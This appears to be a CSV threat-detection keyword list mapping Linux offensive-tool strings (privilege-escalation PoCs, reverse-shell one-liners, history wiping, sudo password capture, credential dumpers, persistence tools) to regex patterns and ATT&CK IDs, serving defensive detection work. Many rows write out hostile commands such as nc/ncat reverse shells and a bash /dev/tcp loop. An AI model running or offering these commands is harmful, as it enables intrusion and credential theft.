"*\looneypwner.sh*",".{0,1000}\\looneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z"
"*] - caution! this means that exploit is not fileless*",".{0,1000}\]\s\-\scaution!\sthis\smeans\sthat\sexploit\sis\snot\sfileless.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*] dumping runtime core memory of the root smart contract*",".{0,1000}\]\sdumping\sruntime\score\smemory\sof\sthe\sroot\ssmart\scontract.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*ln /dev/null -/.bash_history -sf*",".{0,1000}ln\s\/dev\/null\s\-\/\.bash_history\s\-sf.{0,1000}","greyware_tool_keyword","ln","covering history tracks on linux system","T1070 - T1070.001 - T1070.004 - T1070.003 - T1070.002","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://rosesecurity.gitbook.io/red-teaming-ttps/linux","1","0","#linux","risk of False positive","10","10","N/A","N/A","N/A","N/A"
"*] executing xss local file write to hijack systemd user*",".{0,1000}\]\sexecuting\sxss\slocal\sfile\swrite\sto\shijack\ssystemd\suser.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*ln -sf /dev/null *bash_history*",".{0,1000}ln\s\-sf\s\/dev\/null\s.{0,1000}bash_history.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","#linux","greyware tool - risks of False positive !","10","10","9917","2830","2024-12-03T04:36:14Z","2017-10-11T17:23:32Z"
"*] going to escalate the quantum privilege of wifi driver*",".{0,1000}\]\sgoing\sto\sescalate\sthe\squantum\sprivilege\sof\swifi\sdriver.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*] going to inject sql payload into the external mainframe smart contract interface*",".{0,1000}\]\sgoing\sto\sinject\ssql\spayload\sinto\sthe\sexternal\smainframe\ssmart\scontract\sinterface.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*] sending network-based smb hypertrojan with credentials*",".{0,1000}\]\ssending\snetwork\-based\ssmb\shypertrojan\swith\scredentials.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*8a997da8acb30a57bc25ad0913fd6ad163cb6829e40344ac4b352ef0674c0379*",".{0,1000}8a997da8acb30a57bc25ad0913fd6ad163cb6829e40344ac4b352ef0674c0379.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#filehash #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits*",".{0,1000}AlexisAhmed\/CVE\-2022\-0847\-DirtyPipe\-Exploits.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","558","142","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
"*logsave /dev/null /bin/sh -i -p*",".{0,1000}logsave\s\/dev\/null\s\/bin\/sh\s\-i\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*looneypwner.sh *",".{0,1000}looneypwner\.sh\s.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z"
"*chaudharyarjun/LooneyPwner*",".{0,1000}chaudharyarjun\/LooneyPwner.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z"
"*lse.sh -l*",".{0,1000}lse\.sh\s\-l.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*curl http://172.23.0.1:1337/main*",".{0,1000}curl\shttp\:\/\/172\.23\.0\.1\:1337\/main.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","#linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*CVE-2022-0847-DirtyPipe-Exploits.*",".{0,1000}CVE\-2022\-0847\-DirtyPipe\-Exploits\..{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","558","142","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
"*CVE-2024-1086/exploit*",".{0,1000}CVE\-2024\-1086\/exploit.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*lua -e*require('socket');*t:connect*os.execute('""/bin/bash"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""\/bin\/bash\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*lua -e*require('socket');*t:connect*os.execute('""/bin/sh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""\/bin\/sh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*lua -e*require('socket');*t:connect*os.execute('""bash"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""bash\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*CVE-2024-1086-1.0.0.zip*",".{0,1000}CVE\-2024\-1086\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","#linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*d8dd09b01eb4e363d88ff53c0aace04c39dbea822b7adba7a883970abbf72a77*",".{0,1000}d8dd09b01eb4e363d88ff53c0aace04c39dbea822b7adba7a883970abbf72a77.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#filehash #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*dirty_sock*",".{0,1000}dirty_sock.{0,1000}","offensive_tool_keyword","POC","dirty_sock: Linux Privilege Escalation (via snapd) In January 2019. current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/initstring/dirty_sock","1","1","#linux","N/A","N/A","7","662","148","2019-05-09T21:34:26Z","2019-02-12T06:02:06Z"
"*dirtypipe.cm4all.com*",".{0,1000}dirtypipe\.cm4all\.com.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","558","142","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
"*Executing the exploit this may take a while.........................................*",".{0,1000}Executing\sthe\sexploit\sthis\smay\stake\sa\swhile\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#content #linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z"
"*gcc exploit-2.c -o exploit-2*",".{0,1000}gcc\sexploit\-2\.c\s\-o\sexploit\-2.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","558","142","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
"*LooneyPwner-main*",".{0,1000}LooneyPwner\-main.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z"
"*nimbuspwn.py*",".{0,1000}nimbuspwn\.py.{0,1000}","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","1","#linux","N/A","N/A","1","22","7","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z"
"*Notselwyn/CVE-2024-1086*",".{0,1000}Notselwyn\/CVE\-2024\-1086.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","#linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*Root backdoor obtained!*",".{0,1000}Root\sbackdoor\sobtained!.{0,1000}","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","0","#content #linux","N/A","N/A","1","22","7","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z"
"*Running the exploit be patient................................*",".{0,1000}Running\sthe\sexploit\sbe\spatient\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#content #linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z"
"*system(""/tmp/sh"")*",".{0,1000}system\(\""\/tmp\/sh\""\).{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","558","142","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
"*Wow, Dirty CoW reloaded!*",".{0,1000}Wow,\sDirty\sCoW\sreloaded!.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","558","142","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
"*mkdir ~/.bash_history*",".{0,1000}mkdir\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","mkdir","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *",".{0,1000}mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|\/bin\/sh\s\-i\s2\>\&1\|nc\s.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#linux","N/A","10","10","106","50","2024-09-29T18:27:05Z","2022-07-15T05:51:04Z"
"*mod_cgi.shell.bash.htaccess*",".{0,1000}mod_cgi\.shell\.bash\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","#linux","N/A","10","10","1041","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
"*msgfilter -P /bin/sh -p -c '/bin/sh*",".{0,1000}msgfilter\s\-P\s\/bin\/sh\s\-p\s\-c\s\'\/bin\/sh.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*nano /etc/ssh/sshd_config*",".{0,1000}nano\s\/etc\/ssh\/sshd_config.{0,1000}","greyware_tool_keyword","ssh","modification of the sshd configuration file - couldbe an attacker establishing persistence or a legitimate admin behavior","T1059.004 - T1078 - T1053","TA0005 - TA0003 - TA0006","N/A","N/A","Persistence","https://x.com/mthcht/status/1827714529687658796","1","0","#linux","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*nasm -f win64 ./syscalls.asm -o ./syscalls.obj*",".{0,1000}nasm\s\-f\swin64\s\.\/syscalls\.asm\s\-o\s\.\/syscalls\.obj.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","0","#linux","N/A","10","","N/A","","",""
"*nc * -e /bin/bash*",".{0,1000}nc\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","netcat","netcat shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","APT15 - Calypso - EMBER BEAR","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","#linux","greyware tool - risks of False positive !","10","10","61798","14749","2024-12-04T11:10:42Z","2016-10-18T07:29:07Z"
"*nc -e /bin/sh * *",".{0,1000}nc\s\-e\s\/bin\/sh\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z"
"*nc -l -p * -e /bin/bash*",".{0,1000}nc\s\-l\s\-p\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","nc","Netcat Backdoor on Linux - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","Calypso - GALLIUM","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","#linux","N/A","10","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*ncat * -e /bin/bash*",".{0,1000}ncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","APT15 - Calypso - EMBER BEAR","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","#linux","greyware tool - risks of False positive !","10","10","61798","14749","2024-12-04T11:10:42Z","2016-10-18T07:29:07Z"
"*ncat --udp * -e /bin/bash*",".{0,1000}ncat\s\-\-udp\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","APT15 - Calypso - EMBER BEAR","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","#linux","greyware tool - risks of False positive !","10","10","61798","14749","2024-12-04T11:10:42Z","2016-10-18T07:29:07Z"
"*netstat -tnlp || ss -tnlp*",".{0,1000}netstat\s\-tnlp\s\|\|\sss\s\-tnlp.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*netstat -unlp || ss -unlp*",".{0,1000}netstat\s\-unlp\s\|\|\sss\s\-unlp.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*",".{0,1000}nIFS\=.{0,1000}\sread\s\-s\spass\\necho\s\-e\s.{0,1000}User\=.{0,1000}\$\(whoami\).{0,1000}Password\=.{0,1000}\$pass.{0,1000}\>\s\/var\/tmp.{0,1000}","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","0","#linux","N/A","10","9","818","289","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z"
"*nohup ./nps &*",".{0,1000}nohup\s\.\/nps\s\&.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2360","302","2024-11-21T09:23:24Z","2022-09-14T06:24:00Z"
"*nohup bash -c ""while :; do bash -i >& /dev/tcp/*/* 0>&1; sleep 10; done*",".{0,1000}nohup\sbash\s\-c\s\""while\s\:\;\sdo\sbash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\;\ssleep\s10\;\sdone.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*-o ProxyCommand=;/bin/bash -c *--locationPassword*",".{0,1000}\-o\sProxyCommand\=\;\/bin\/bash\s\-c\s.{0,1000}\-\-locationPassword.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","#linux","N/A","10","1","38","7","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z"
"*Orange-Cyberdefense/LinikatzV2*",".{0,1000}Orange\-Cyberdefense\/LinikatzV2.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","138","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z"
"*os.execute(*/bin/*nmap --script=$*",".{0,1000}os\.execute\(.{0,1000}\/bin\/.{0,1000}nmap\s\-\-script\=\$.{0,1000}","greyware_tool_keyword","nmap","Nmap Privilege Escalation","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13","Privilege Escalation","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","N/A","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*P0rtcu11i5!*",".{0,1000}P0rtcu11i5!.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*package_cvs_into_lse.sh*",".{0,1000}package_cvs_into_lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*pamspy: Failed to increase RLIMIT_MEMLOCK limit!*",".{0,1000}pamspy\:\sFailed\sto\sincrease\sRLIMIT_MEMLOCK\slimit!.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*pamspy: Failed to load BPF program: *",".{0,1000}pamspy\:\sFailed\sto\sload\sBPF\sprogram\:\s.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*pamspy: Unable to find pam_get_authtok function in*",".{0,1000}pamspy\:\sUnable\sto\sfind\spam_get_authtok\sfunction\sin.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*panix.sh --ssh-key *",".{0,1000}panix\.sh\s\-\-ssh\-key\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
